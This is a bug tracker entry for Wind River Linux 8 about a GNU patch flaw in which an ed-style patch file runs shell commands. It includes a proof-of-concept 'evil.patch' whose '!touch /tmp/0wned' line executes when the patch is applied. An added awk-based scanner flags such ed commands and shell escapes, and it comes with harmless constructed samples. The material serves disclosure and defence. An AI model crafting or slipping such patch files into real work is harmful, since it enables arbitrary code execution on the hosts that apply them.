Fixed
Created: Apr 7, 2018
Updated: Dec 3, 2018
Resolved Date: May 9, 2018
Found In Version: 8.0
Fix Version: 8.0.0.26
Severity: Standard
Applicable for: Wind River Linux 8
Component/s: Build & Config
The problem was pointed out in several internet posts after someone found it buried in the HN /new queue as a simple link to the Debian bug tracker:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894667#19
--
The steps to reproduce show the problem in more detail. Hopefully a patch will be submitted for GNU patch to resolve the problem.
FreeBSD fixed a similar problem here:
https://www.freebsd.org/security/advisories/FreeBSD-SA-15:18.bsdpatch.asc
---- demonstration below ---
% cd /tmp
% cat<<EOF>evil.patch
--- /dev/null 2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c 2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!touch /tmp/0wned; ls -la /tmp/0wned
.
EOF
% touch beep.c
% patch < evil.patch
?
?
-rw-r--r-- 1 jwessel users 0 Apr 5 15:58 /tmp/0wned
?
patch: **** ed FAILED
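
A pre-flight check a build could run before handing a file to patch, as an added example that is not part of the original report or of GNU patch: it flags ed-style command lines and "!" shell escapes of the kind shown in the demonstration above. The function names and both sample inputs are constructed for illustration, and the scanner is a heuristic that rejects any file containing an ed command line.

```shell
#!/bin/sh
# Added example: refuse ed-style diffs before they reach patch(1).

# scan_patch [FILE]  (reads standard input when FILE is omitted)
# Prints "LINENO: kind: text" for each suspicious line.
# Returns 1 if the input looks like an ed script, 0 otherwise.
scan_patch() {
    awk '
        # An ed command line is an address or address range followed by
        # a, c, d or i, or by an s/// substitution. Body lines of unified
        # and context hunks start with "+", "-", " ", "!" or "\", so a
        # line of this shape does not occur inside them. Normal diffs use
        # "5a6,7", which has digits after the letter and is not matched.
        /^[0-9]+(,[0-9]+)?[acdi]$/ || /^[0-9]+(,[0-9]+)?s\// {
            printf "%d: ed-command: %s\n", NR, $0
            ed = 1; bad = 1; next
        }
        # Once an ed command has been seen, a leading "!" is treated as a
        # shell escape. This is conservative: it does not track whether ed
        # would be in text-input mode at that point.
        ed && /^!/ {
            printf "%d: shell-escape: %s\n", NR, $0
            bad = 1
        }
        END { exit bad ? 1 : 0 }
    ' "${1:--}"
}

# Constructed sample shaped like the input in the report, harmless payload.
sample_ed() {
    printf '%s\n' '--- /dev/null' '+++ b/beep.c' '1337a' '1,112d' \
        '!echo constructed-example' '.'
}

# Constructed unified diff whose added lines only resemble ed commands.
sample_unified() {
    printf '%s\n' '--- a/beep.c' '+++ b/beep.c' '@@ -1,2 +1,3 @@' \
        ' int main(void) {' '+12a' '+!not a shell escape' ' }'
}

# Typical use in a build step (some.patch is a placeholder name):
#   scan_patch some.patch && patch -p1 < some.patch
```

The check is a stopgap for build hosts that still carry an unfixed patch; it does not replace updating to the fixed version.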